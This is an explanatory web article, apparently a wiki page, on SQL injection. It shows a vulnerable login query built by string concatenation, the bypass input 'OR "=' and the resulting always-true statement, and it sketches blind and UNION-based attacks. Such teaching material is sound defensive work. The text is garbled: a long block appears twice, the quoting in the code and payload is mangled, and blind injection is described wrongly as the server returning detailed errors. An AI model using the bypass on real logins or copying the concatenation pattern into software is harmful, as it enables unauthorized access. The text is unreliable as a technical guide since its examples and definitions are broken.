SQL injection is an attacking technique used to compromise the security of the Web application which constructs SQL statements from the user data. Structured Query Language (SQL) is a specialized programming language used to work with databases via statements and queries. SQL is ANSI and ISO standard, so it is currently most widely spread language for database processing, used by the majority of modern Web applications. Web applications may use user data to create special SQL statements for working with dynamically generated Web pages. When Web applications do not manage to correctly fix user data, there is a possibility that the attacker change the construction of the background SQL statement. If the attacker manages to change the SQL statement, the process will run with the authorization of the component which gave that command (eg. database server, Web server). The result of this attacking technique is taking the control over the database, and even executing the commands on the system. An example is the authentication Web application, which contains the following code to build the SQL statement: String SQLQuery = SELECT Username FROM Users WHERE Username = + username + AND Password = + password + ; In this code, the programmer takes user data from the authentication form and directly enters them into the SQL statement (via the variables user name and password). Suppose now that the attacker in the authentication form enters the following:
User name: 'OR "='
Password: 'OR "='
Then the result SQL statement will look like the following:
SELECT Username FROM Users WHERE Username = "OR"="
AND Password = " OR "="
It is obvious that instead of comparing the user data with the data inside the Users table, ' '(empty sequence) with " (empty sequence) will be compared. Therefore, the result of this SQL statement will always be true and the attacker will be able to log in to the system as the first in the Users table. Most often, the most effective method for detecting the SQL injection vulnerability is the manual search, i.e. studying of various application input data and inserting special characters. Since working with databases often results in feedback in the form of Web page with the error message, a potential attacker can roughly determine the syntax of the SQL statement in a specific database and perform SQL injection attack. Thus, when developing Web application, special attention should be paid to the thoroughness of page containing the error message, in order not to reveal redundant information. In general, there are two types of SQL injection attack: blind and normal SQL injection. Blind SQL injection attack is already mentioned in the previous section, when discussing the manual search. Thus, during a blind SQL injection attack, instead of recovering simple and short error message, the server returns detailed description of the error and helps the attacker. On the basis of this message, the attacker tries to implement the SQL injection attack by setting true and false statement as the value of the specific parameter.
Normal SQL injection attack uses union select statement as a parameter value, so that the attacker can discover whether it is possible to access the database.
The success of this attack depends on the number of columns in the requested table, so the attacker needs to determine the correct number of columns (attributes). If this determination succeeds, the attacker will get an insight to the database.
User name: 'OR "='
Password: 'OR "='
Then the result SQL statement will look like the following:
SELECT Username FROM Users WHERE Username = "OR"="
AND Password = " OR "="
It is obvious that instead of comparing the user data with the data inside the Users table, ' '(empty sequence) with " (empty sequence) will be compared. Therefore, the result of this SQL statement will always be true and the attacker will be able to log in to the system as the first in the Users table. Most often, the most effective method for detecting the SQL injection vulnerability is the manual search, i.e. studying of various application input data and inserting special characters. Since working with databases often results in feedback in the form of Web page with the error message, a potential attacker can roughly determine the syntax of the SQL statement in a specific database and perform SQL injection attack. Thus, when developing Web application, special attention should be paid to the thoroughness of page containing the error message, in order not to reveal redundant information. In general, there are two types of SQL injection attack: blind and normal SQL injection. Blind SQL injection attack is already mentioned in the previous section, when discussing the manual search. Thus, during a blind SQL injection attack, instead of recovering simple and short error message, the server returns detailed description of the error and helps the attacker. On the basis of this message, the attacker tries to implement the SQL injection attack by setting true and false statement as the value of the specific parameter.
Normal SQL injection attack uses union select statement as a parameter value, so that the attacker can discover whether it is possible to access the database.
The success of this attack depends on the number of columns in the requested table, so the attacker needs to determine the correct number of columns (attributes). If this determination succeeds, the attacker will get an insight to the database.
Son düzenleme: